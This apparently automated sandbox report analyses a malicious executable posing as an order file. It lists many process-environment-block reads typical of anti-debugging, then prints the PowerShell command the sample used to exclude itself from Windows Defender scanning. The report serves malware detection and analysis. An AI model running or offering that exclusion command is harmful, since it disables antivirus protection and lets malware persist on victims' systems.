            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D6620 mov eax, dword ptr fs:[00000030h]6_2_017D6620
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8620 mov eax, dword ptr fs:[00000030h]6_2_017D8620
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E2619 mov eax, dword ptr fs:[00000030h]6_2_017E2619
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B260B mov eax, dword ptr fs:[00000030h]6_2_017B260B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E6F2 mov eax, dword ptr fs:[00000030h]6_2_0181E6F2
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018206F1 mov eax, dword ptr fs:[00000030h]6_2_018206F1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018206F1 mov eax, dword ptr fs:[00000030h]6_2_018206F1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E609 mov eax, dword ptr fs:[00000030h]6_2_0181E609
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]6_2_017DA6C7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA6C7 mov eax, dword ptr fs:[00000030h]6_2_017DA6C7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D66B0 mov eax, dword ptr fs:[00000030h]6_2_017D66B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC6A6 mov eax, dword ptr fs:[00000030h]6_2_017DC6A6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186866E mov eax, dword ptr fs:[00000030h]6_2_0186866E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186866E mov eax, dword ptr fs:[00000030h]6_2_0186866E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4690 mov eax, dword ptr fs:[00000030h]6_2_017A4690
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4690 mov eax, dword ptr fs:[00000030h]6_2_017A4690
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov eax, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov edx, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov eax, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov esi, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov eax, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov eax, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018369C0 mov eax, dword ptr fs:[00000030h]6_2_018369C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186A9D3 mov eax, dword ptr fs:[00000030h]6_2_0186A9D3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798918 mov eax, dword ptr fs:[00000030h]6_2_01798918
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798918 mov eax, dword ptr fs:[00000030h]6_2_01798918
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E9E0 mov eax, dword ptr fs:[00000030h]6_2_0182E9E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D29F9 mov eax, dword ptr fs:[00000030h]6_2_017D29F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D29F9 mov eax, dword ptr fs:[00000030h]6_2_017D29F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E908 mov eax, dword ptr fs:[00000030h]6_2_0181E908
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E908 mov eax, dword ptr fs:[00000030h]6_2_0181E908
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C912 mov eax, dword ptr fs:[00000030h]6_2_0182C912
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182892A mov eax, dword ptr fs:[00000030h]6_2_0182892A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0183892B mov eax, dword ptr fs:[00000030h]6_2_0183892B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D49D0 mov eax, dword ptr fs:[00000030h]6_2_017D49D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01820946 mov eax, dword ptr fs:[00000030h]6_2_01820946
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A09AD mov eax, dword ptr fs:[00000030h]6_2_017A09AD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A09AD mov eax, dword ptr fs:[00000030h]6_2_017A09AD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B29A0 mov eax, dword ptr fs:[00000030h]6_2_017B29A0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01844978 mov eax, dword ptr fs:[00000030h]6_2_01844978
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01844978 mov eax, dword ptr fs:[00000030h]6_2_01844978
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C97C mov eax, dword ptr fs:[00000030h]6_2_0182C97C
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C89D mov eax, dword ptr fs:[00000030h]6_2_0182C89D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4859 mov eax, dword ptr fs:[00000030h]6_2_017A4859
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4859 mov eax, dword ptr fs:[00000030h]6_2_017A4859
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D0854 mov eax, dword ptr fs:[00000030h]6_2_017D0854
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B2840 mov ecx, dword ptr fs:[00000030h]6_2_017B2840
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018708C0 mov eax, dword ptr fs:[00000030h]6_2_018708C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov eax, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov eax, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov eax, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov ecx, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov eax, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C2835 mov eax, dword ptr fs:[00000030h]6_2_017C2835
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA830 mov eax, dword ptr fs:[00000030h]6_2_017DA830
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186A8E4 mov eax, dword ptr fs:[00000030h]6_2_0186A8E4
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC8F9 mov eax, dword ptr fs:[00000030h]6_2_017DC8F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC8F9 mov eax, dword ptr fs:[00000030h]6_2_017DC8F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C810 mov eax, dword ptr fs:[00000030h]6_2_0182C810
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CE8C0 mov eax, dword ptr fs:[00000030h]6_2_017CE8C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184483A mov eax, dword ptr fs:[00000030h]6_2_0184483A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184483A mov eax, dword ptr fs:[00000030h]6_2_0184483A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E872 mov eax, dword ptr fs:[00000030h]6_2_0182E872
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E872 mov eax, dword ptr fs:[00000030h]6_2_0182E872
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836870 mov eax, dword ptr fs:[00000030h]6_2_01836870
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836870 mov eax, dword ptr fs:[00000030h]6_2_01836870
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0887 mov eax, dword ptr fs:[00000030h]6_2_017A0887
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0179CB7E mov eax, dword ptr fs:[00000030h]6_2_0179CB7E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01854BB0 mov eax, dword ptr fs:[00000030h]6_2_01854BB0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01854BB0 mov eax, dword ptr fs:[00000030h]6_2_01854BB0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184EBD0 mov eax, dword ptr fs:[00000030h]6_2_0184EBD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CEB20 mov eax, dword ptr fs:[00000030h]6_2_017CEB20
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CEB20 mov eax, dword ptr fs:[00000030h]6_2_017CEB20
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182CBF0 mov eax, dword ptr fs:[00000030h]6_2_0182CBF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CEBFC mov eax, dword ptr fs:[00000030h]6_2_017CEBFC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8BF0 mov eax, dword ptr fs:[00000030h]6_2_017A8BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8BF0 mov eax, dword ptr fs:[00000030h]6_2_017A8BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8BF0 mov eax, dword ptr fs:[00000030h]6_2_017A8BF0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181EB1D mov eax, dword ptr fs:[00000030h]6_2_0181EB1D
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01868B28 mov eax, dword ptr fs:[00000030h]6_2_01868B28
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01868B28 mov eax, dword ptr fs:[00000030h]6_2_01868B28
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0BCD mov eax, dword ptr fs:[00000030h]6_2_017A0BCD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0BCD mov eax, dword ptr fs:[00000030h]6_2_017A0BCD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0BCD mov eax, dword ptr fs:[00000030h]6_2_017A0BCD
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C0BCB mov eax, dword ptr fs:[00000030h]6_2_017C0BCB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C0BCB mov eax, dword ptr fs:[00000030h]6_2_017C0BCB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C0BCB mov eax, dword ptr fs:[00000030h]6_2_017C0BCB
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836B40 mov eax, dword ptr fs:[00000030h]6_2_01836B40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01836B40 mov eax, dword ptr fs:[00000030h]6_2_01836B40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0BBE mov eax, dword ptr fs:[00000030h]6_2_017B0BBE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0BBE mov eax, dword ptr fs:[00000030h]6_2_017B0BBE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186AB40 mov eax, dword ptr fs:[00000030h]6_2_0186AB40
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01848B42 mov eax, dword ptr fs:[00000030h]6_2_01848B42
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01854B4B mov eax, dword ptr fs:[00000030h]6_2_01854B4B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01854B4B mov eax, dword ptr fs:[00000030h]6_2_01854B4B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01872B57 mov eax, dword ptr fs:[00000030h]6_2_01872B57
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01872B57 mov eax, dword ptr fs:[00000030h]6_2_01872B57
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01872B57 mov eax, dword ptr fs:[00000030h]6_2_01872B57
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01872B57 mov eax, dword ptr fs:[00000030h]6_2_01872B57
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184EB50 mov eax, dword ptr fs:[00000030h]6_2_0184EB50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01874A80 mov eax, dword ptr fs:[00000030h]6_2_01874A80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DCA6F mov eax, dword ptr fs:[00000030h]6_2_017DCA6F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DCA6F mov eax, dword ptr fs:[00000030h]6_2_017DCA6F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DCA6F mov eax, dword ptr fs:[00000030h]6_2_017DCA6F
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0A5B mov eax, dword ptr fs:[00000030h]6_2_017B0A5B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017B0A5B mov eax, dword ptr fs:[00000030h]6_2_017B0A5B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A6A50 mov eax, dword ptr fs:[00000030h]6_2_017A6A50
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DCA38 mov eax, dword ptr fs:[00000030h]6_2_017DCA38
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C4A35 mov eax, dword ptr fs:[00000030h]6_2_017C4A35
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C4A35 mov eax, dword ptr fs:[00000030h]6_2_017C4A35
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017CEA2E mov eax, dword ptr fs:[00000030h]6_2_017CEA2E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DCA24 mov eax, dword ptr fs:[00000030h]6_2_017DCA24
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182CA11 mov eax, dword ptr fs:[00000030h]6_2_0182CA11
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DAAEE mov eax, dword ptr fs:[00000030h]6_2_017DAAEE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DAAEE mov eax, dword ptr fs:[00000030h]6_2_017DAAEE
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A0AD0 mov eax, dword ptr fs:[00000030h]6_2_017A0AD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D4AD0 mov eax, dword ptr fs:[00000030h]6_2_017D4AD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D4AD0 mov eax, dword ptr fs:[00000030h]6_2_017D4AD0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F6ACC mov eax, dword ptr fs:[00000030h]6_2_017F6ACC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F6ACC mov eax, dword ptr fs:[00000030h]6_2_017F6ACC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F6ACC mov eax, dword ptr fs:[00000030h]6_2_017F6ACC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8AA0 mov eax, dword ptr fs:[00000030h]6_2_017A8AA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8AA0 mov eax, dword ptr fs:[00000030h]6_2_017A8AA0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017F6AA4 mov eax, dword ptr fs:[00000030h]6_2_017F6AA4
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0184EA60 mov eax, dword ptr fs:[00000030h]6_2_0184EA60
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D8A90 mov edx, dword ptr fs:[00000030h]6_2_017D8A90
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181CA72 mov eax, dword ptr fs:[00000030h]6_2_0181CA72
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181CA72 mov eax, dword ptr fs:[00000030h]6_2_0181CA72
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AEA80 mov eax, dword ptr fs:[00000030h]6_2_017AEA80
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8D59 mov eax, dword ptr fs:[00000030h]6_2_017A8D59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8D59 mov eax, dword ptr fs:[00000030h]6_2_017A8D59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8D59 mov eax, dword ptr fs:[00000030h]6_2_017A8D59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A8D59 mov eax, dword ptr fs:[00000030h]6_2_017A8D59
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
